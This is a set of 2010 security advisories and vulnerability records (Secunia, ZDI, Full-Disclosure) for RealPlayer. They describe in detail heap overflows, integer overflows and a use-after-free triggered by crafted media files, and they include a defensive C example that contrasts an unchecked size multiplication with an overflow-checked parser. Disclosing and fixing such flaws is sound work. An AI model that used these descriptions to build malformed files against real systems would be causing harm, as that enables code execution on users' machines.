_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
VAR-201012-0320 | CVE-2010-2999 | RealNetworks RealPlayer of AAC MLLT Atom Integer overflow vulnerability in analysis processing |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a malformed MLLT atom in an AAC file. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of RealNetworks RealPlayer. The application uses a size field from the MLLT atom to allocate a list of objects. To calculate the allocation size, the application multiplies this length by 8. If the product does not fit in 32 bits, an integer overflow occurs and the buffer is allocated too small. When data is then copied into this buffer, heap corruption occurs, which can lead to code execution in the context of the currently logged-in user. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
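The size computation described above (a 32-bit entry count multiplied by 8) is shown below as an added example; it is not RealNetworks code and is not taken from any of the advisories. The only figure it borrows from the record is the 8-byte multiplier. The atom layout it parses (a 4-byte big-endian entry count followed by the entries) is a constructed stand-in, not the real MLLT layout, and the function names are the example's own. It places the wrapping computation beside an overflow-checked parser that refuses the atom before allocating anything.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not RealNetworks code. The multiplier of 8 bytes per list
 * entry comes from the advisory; the atom layout below (4-byte big-endian
 * entry count, then the entries) is a constructed stand-in for illustration. */
#define ENTRY_SIZE 8u

/* The pattern the advisory describes: a 32-bit multiply that wraps, so a huge
 * count yields a tiny allocation that the later copy overruns. */
uint32_t unchecked_alloc_size(uint32_t count)
{
    return count * ENTRY_SIZE;            /* computed modulo 2^32 */
}

/* Hardened form: prove the product fits before allocating, and also require
 * that the atom actually carries that many bytes of entries. */
bool checked_alloc_size(uint32_t count, size_t avail, size_t *out)
{
    if (count > UINT32_MAX / ENTRY_SIZE)  /* product would exceed 32 bits */
        return false;
    uint64_t need = (uint64_t)count * ENTRY_SIZE;
    if (need > avail)                     /* count claims more than is present */
        return false;
    *out = (size_t)need;
    return true;
}

enum { ATOM_OK = 0, ATOM_TRUNCATED = 1, ATOM_BAD_SIZE = 2 };

/* Parse the constructed atom body. On ATOM_OK, *list holds a copy of the
 * entries (NULL when the count is 0) and *list_len its length in bytes. */
int parse_list_atom(const uint8_t *atom, size_t len, uint8_t **list, size_t *list_len)
{
    *list = NULL;
    *list_len = 0;
    if (len < 4)
        return ATOM_TRUNCATED;
    uint32_t count = ((uint32_t)atom[0] << 24) | ((uint32_t)atom[1] << 16) |
                     ((uint32_t)atom[2] << 8)  |  (uint32_t)atom[3];
    size_t need;
    if (!checked_alloc_size(count, len - 4, &need))
        return ATOM_BAD_SIZE;             /* refuse instead of allocating */
    if (need == 0)
        return ATOM_OK;
    uint8_t *buf = malloc(need);
    if (buf == NULL)
        return ATOM_BAD_SIZE;
    memcpy(buf, atom + 4, need);          /* bounded by the check above */
    *list = buf;
    *list_len = need;
    return ATOM_OK;
}

int main(void)
{
    /* Constructed inputs: a well-formed two-entry atom, and one whose count of
     * 0x20000001 makes the unchecked 32-bit product wrap to just 8 bytes. */
    const uint8_t good[] = { 0,0,0,2, 1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16 };
    const uint8_t wrap[] = { 0x20,0,0,1, 0xAA,0xAA,0xAA,0xAA,0xAA,0xAA,0xAA,0xAA };
    uint8_t *list;
    size_t n;

    printf("unchecked size for count 0x20000001: %u bytes\n",
           unchecked_alloc_size(0x20000001u));
    printf("good atom -> %d\n", parse_list_atom(good, sizeof good, &list, &n));
    free(list);
    printf("wrap atom -> %d\n", parse_list_atom(wrap, sizeof wrap, &list, &n));
    return 0;
}
```

The check `count > UINT32_MAX / ENTRY_SIZE` is the portable way to reject a product before it wraps; the second check, that the atom really contains `count * 8` bytes, is what stops a truthful-but-oversized count from driving a read past the end of the input.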
This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it.
----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
ZDI-10-273: RealNetworks RealPlayer AAC MLLT Atom Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-273
December 10, 2010
-- CVE ID:
CVE-2010-2999
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8415.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-08-20 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
VAR-201012-0319 | CVE-2010-2997 | RealNetworks RealPlayer Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Use-after-free vulnerability in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.0.1, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted StreamTitle tag in an ICY SHOUTcast stream, related to the SMIL file format. User interaction is required to exploit this vulnerability in that the target must open a malicious SHOUTcast stream. The specific flaw exists in the processing of the StreamTitle tag in a SHOUTcast stream using the ICY protocol. A specially crafted string supplied as the title property can cause a heap allocation to fail. The failure path then frees critical pointers that are subsequently used after they have been freed. Successful exploitation of this vulnerability can lead to system compromise under the credentials of the currently logged-in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap-corruption vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.0.1 and prior, Mac RealPlayer 11.1.0.1116 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading and converting videos (in web pages), editing videos, managing media files, and more.
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
----------------------------------------------------------------------
ZDI-10-270: RealNetworks RealPlayer ICY Protocol StreamTitle Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-270
December 10, 2010
-- CVE ID:
CVE-2010-2997
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8344.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
VAR-201012-0254 | CVE-2010-4377 | RealNetworks RealPlayer of Cook Audio Codec Heap-based buffer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code by specifying many subbands in cook audio codec information in a Real Audio file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious media file. The specific flaw exists in the parsing of audio codec information encapsulated in a Real Audio media file. By specifying a large number of subbands, an allocated heap chunk can be overflowed. Successful exploitation can result in system compromise under the credentials of the currently logged-in user.
Real Networks released an advisory regarding 27 security vulnerabilities in RealPlayer. Real Networks RealPlayer is prone to a heap-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Windows RealPlayer SP 1.1.5 and prior, Mac RealPlayer 12.0.0.1444 and prior, Linux RealPlayer 11.0.2.1744 and prior.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it.
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing an MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
